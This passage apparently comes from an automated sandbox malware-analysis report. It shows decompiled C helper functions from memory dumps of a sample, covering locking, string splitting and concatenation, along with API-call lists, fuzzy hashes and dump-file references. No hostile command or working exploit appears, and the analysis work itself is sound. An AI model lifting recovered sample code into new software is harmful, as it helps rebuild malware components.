                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,04879199), ref: 048729F2
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(05259570), ref: 04872A0E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 58946197-0
                                                                                                                                                                                                                                                            • Opcode ID: cabc351d72bbc930c7e22757d69879b61adf3d258f813ae810bd4c0c4fd5fd9f
                                                                                                                                                                                                                                                            • Instruction ID: ceeb78a663f3417b88989c23c3be91d323846ef63ab26cd007506495d68e02c4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cabc351d72bbc930c7e22757d69879b61adf3d258f813ae810bd4c0c4fd5fd9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8F03471200200DBE721AB29E9ACF0AB7E4FF24344F088E08F545E7242D628FC80DB25
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                            			E0487825F() {
                                                                                                                                                                                                                                                            				void* _v0;
                                                                                                                                                                                                                                                            				void** _t3;
                                                                                                                                                                                                                                                            				void** _t5;
                                                                                                                                                                                                                                                            				void** _t7;
                                                                                                                                                                                                                                                            				void** _t8;
                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t3 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t5 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                                            					if( *_t1 == 0) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					Sleep(0xa);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t7 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				_t10 =  *_t7;
                                                                                                                                                                                                                                                            				if(_t10 != 0 && _t10 != 0x487e836) {
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, 0, _t10);
                                                                                                                                                                                                                                                            					_t7 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				 *_t7 = _v0;
                                                                                                                                                                                                                                                            				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                                            				__imp__(_t8);
                                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                            0x0487825f
                                                                                                                                                                                                                                                            0x04878268
                                                                                                                                                                                                                                                            0x04878278
                                                                                                                                                                                                                                                            0x04878278
                                                                                                                                                                                                                                                            0x0487827d
                                                                                                                                                                                                                                                            0x04878282
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878272
                                                                                                                                                                                                                                                            0x04878272
                                                                                                                                                                                                                                                            0x04878284
                                                                                                                                                                                                                                                            0x04878289
                                                                                                                                                                                                                                                            0x0487828d
                                                                                                                                                                                                                                                            0x048782a0
                                                                                                                                                                                                                                                            0x048782a6
                                                                                                                                                                                                                                                            0x048782a6
                                                                                                                                                                                                                                                            0x048782af
                                                                                                                                                                                                                                                            0x048782b1
                                                                                                                                                                                                                                                            0x048782b5
                                                                                                                                                                                                                                                            0x048782bb

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlEnterCriticalSection.NTDLL(05259570), ref: 04878268
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,04879199), ref: 04878272
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,04879199), ref: 048782A0
                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(05259570), ref: 048782B5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 58946197-0
                                                                                                                                                                                                                                                            • Opcode ID: bba129638986663a2dba56aa0950b5b24a7b4f7d99f07714042f783b7655e186
                                                                                                                                                                                                                                                            • Instruction ID: e5697c545cd2fbc016ee48253b65f692e2786f9d3142943bb1c4e1336dd5b8b5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bba129638986663a2dba56aa0950b5b24a7b4f7d99f07714042f783b7655e186
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F0B274610200DFEB18EB6AD9BDB2937E5FF18346F044D08EA06D7250D638FC40DA55
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                                                            			E048791F1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                            				char* _t30;
                                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                                            				int _t42;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t17 = __eax;
                                                                                                                                                                                                                                                            				_t37 = 0;
                                                                                                                                                                                                                                                            				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                                            				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                                            				_t28 = _t2;
                                                                                                                                                                                                                                                            				_t34 = E048716F8(_t2);
                                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                                            					_t30 = E048716F8(_t28);
                                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                                            						E048770FF(_t34);
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t39 = _a4;
                                                                                                                                                                                                                                                            						_t22 = E0487A8BD(_t39);
                                                                                                                                                                                                                                                            						_v8 = _t22;
                                                                                                                                                                                                                                                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                                            							_a4 = _t39;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t26 = _t22 + 2;
                                                                                                                                                                                                                                                            							_a4 = _t22 + 2;
                                                                                                                                                                                                                                                            							_t22 = E0487A8BD(_t26);
                                                                                                                                                                                                                                                            							_v8 = _t22;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_t22 == 0) {
                                                                                                                                                                                                                                                            							__imp__(_t34, _a4);
                                                                                                                                                                                                                                                            							 *_t30 = 0x2f;
                                                                                                                                                                                                                                                            							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                                            							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                                            							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                                            							__imp__(_t30, _v8);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						 *_a8 = _t34;
                                                                                                                                                                                                                                                            						_t37 = 1;
                                                                                                                                                                                                                                                            						 *_a12 = _t30;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                            0x048791f1
                                                                                                                                                                                                                                                            0x048791fb
                                                                                                                                                                                                                                                            0x048791fd
                                                                                                                                                                                                                                                            0x04879203
                                                                                                                                                                                                                                                            0x04879203
                                                                                                                                                                                                                                                            0x0487920c
                                                                                                                                                                                                                                                            0x04879210
                                                                                                                                                                                                                                                            0x0487921c
                                                                                                                                                                                                                                                            0x04879220
                                                                                                                                                                                                                                                            0x04879294
                                                                                                                                                                                                                                                            0x04879222
                                                                                                                                                                                                                                                            0x04879222
                                                                                                                                                                                                                                                            0x04879226
                                                                                                                                                                                                                                                            0x0487922d
                                                                                                                                                                                                                                                            0x04879230
                                                                                                                                                                                                                                                            0x0487924a
                                                                                                                                                                                                                                                            0x04879239
                                                                                                                                                                                                                                                            0x04879239
                                                                                                                                                                                                                                                            0x0487923d
                                                                                                                                                                                                                                                            0x04879240
                                                                                                                                                                                                                                                            0x04879245
                                                                                                                                                                                                                                                            0x04879245
                                                                                                                                                                                                                                                            0x0487924f
                                                                                                                                                                                                                                                            0x04879277
                                                                                                                                                                                                                                                            0x0487927d
                                                                                                                                                                                                                                                            0x04879280
                                                                                                                                                                                                                                                            0x04879251
                                                                                                                                                                                                                                                            0x04879253
                                                                                                                                                                                                                                                            0x0487925b
                                                                                                                                                                                                                                                            0x04879266
                                                                                                                                                                                                                                                            0x0487926b
                                                                                                                                                                                                                                                            0x0487926b
                                                                                                                                                                                                                                                            0x04879287
                                                                                                                                                                                                                                                            0x0487928e
                                                                                                                                                                                                                                                            0x0487928f
                                                                                                                                                                                                                                                            0x0487928f
                                                                                                                                                                                                                                                            0x04879220
                                                                                                                                                                                                                                                            0x0487929f

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,0487439F,?,?,?,?,00000102,048792E3,?,?,00000000), ref: 048791FD
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                              • Part of subcall function 0487A8BD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0487922B,00000000,00000001,00000001,?,?,0487439F,?,?,?,?,00000102), ref: 0487A8CB
                                                                                                                                                                                                                                                              • Part of subcall function 0487A8BD: StrChrA.SHLWAPI(?,0000003F,?,?,0487439F,?,?,?,?,00000102,048792E3,?,?,00000000,00000000), ref: 0487A8D5
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0487439F,?,?,?,?,00000102,048792E3,?), ref: 0487925B
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0487926B
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04879277
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3767559652-0
                                                                                                                                                                                                                                                            • Opcode ID: 96ee3fabe8a839d3c2c1288fefd15b54fc20d8b22c299c92f68609f845b50fa2
                                                                                                                                                                                                                                                            • Instruction ID: 380d617c24c87586e2413934404cecda046bb6790baac4577d6cf6a5780c2eed
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96ee3fabe8a839d3c2c1288fefd15b54fc20d8b22c299c92f68609f845b50fa2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95210AB1504255FFEB017FA8C868E9E7FADDF06694B048A50F915EB211D774ED0087E1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04878B9C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                                            				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                                            				_t18 = E048716F8(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                                            				_v8 = _t18;
                                                                                                                                                                                                                                                            				if(_t18 != 0) {
                                                                                                                                                                                                                                                            					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                                            					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                                            					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                                            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                            0x04878bb1
                                                                                                                                                                                                                                                            0x04878bb5
                                                                                                                                                                                                                                                            0x04878bbf
                                                                                                                                                                                                                                                            0x04878bc6
                                                                                                                                                                                                                                                            0x04878bc9
                                                                                                                                                                                                                                                            0x04878bcb
                                                                                                                                                                                                                                                            0x04878bd3
                                                                                                                                                                                                                                                            0x04878bd8
                                                                                                                                                                                                                                                            0x04878be6
                                                                                                                                                                                                                                                            0x04878beb
                                                                                                                                                                                                                                                            0x04878bf5

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,0525936C,?,04879DF1,004F0053,0525936C,?,?,?,?,?,?,0487876C), ref: 04878BAC
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(04879DF1,?,04879DF1,004F0053,0525936C,?,?,?,?,?,?,0487876C), ref: 04878BB3
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,04879DF1,004F0053,0525936C,?,?,?,?,?,?,0487876C), ref: 04878BD3
                                                                                                                                                                                                                                                            • memcpy.NTDLL(73B769A0,04879DF1,00000002,00000000,004F0053,73B769A0,?,?,04879DF1,004F0053,0525936C), ref: 04878BE6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2411391700-0
                                                                                                                                                                                                                                                            • Opcode ID: e1619767e8122473abe7f3d7c7980ef0c2c4ee40987424b6ce32ce2024472876
                                                                                                                                                                                                                                                            • Instruction ID: bc34f5d89098824c7745afbe63a048281f85fe7c29975704a0af43701bca4bf9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1619767e8122473abe7f3d7c7980ef0c2c4ee40987424b6ce32ce2024472876
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AF04972900118BB8F10EFA8CC88C9E7BACEF09258B054566FD08D7201E671EE118BA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(052587FA,00000000,00000000,745EC740,04878EFD,00000000), ref: 04874571
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 04874579
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,052587FA), ref: 0487458D
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 04874598
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 74227042-0
                                                                                                                                                                                                                                                            • Opcode ID: 24f8331b09d74a02f51354760c7ab908718a6c8bfe062ed62b9091c08e957eb1
                                                                                                                                                                                                                                                            • Instruction ID: 3433b9f58737508d066feb4b705e135a26a9f5eca54ceea03f89586a3bcab5b4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24f8331b09d74a02f51354760c7ab908718a6c8bfe062ed62b9091c08e957eb1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E04873501275AB8711AFE8AC5CC9FBBADEF99B513044D16F604E3110C768DD059BE1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%